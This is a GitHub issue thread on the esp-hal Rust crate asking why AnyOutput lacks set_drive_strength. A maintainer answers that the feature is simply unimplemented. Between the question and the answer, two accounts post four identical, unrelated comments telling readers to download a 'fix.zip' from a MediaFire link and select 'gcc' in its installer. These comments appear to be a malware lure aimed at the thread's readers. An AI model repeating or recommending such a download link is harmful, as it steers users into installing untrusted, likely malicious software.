### ISSUE TITLE
set_drive_strength for AnyOutput

### ISSUE THREAD

**Issue by undefinedvalue** [esp-rs/esp-hal#1995]
Is there a technical limitation to why esp_hal::gpio::AnyOutput doesn't support set_drive_strength? If not, it should support it to have feature parity with Output.

If there is a reason this can't be done, is there a workaround that still allows creating an AnyOutput for the pin?

(Also, just want to say that the new API for pins is a huge improvement over the last time I was working with this over a year ago, nice work)

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by jessebraham** [comment]
There is no technical reason as far as I'm aware, this functionality simply has not been implemented yet. Would be happy to accept a PR for this, otherwise one of the maintainers can take a swing at it whenever they have some free time.
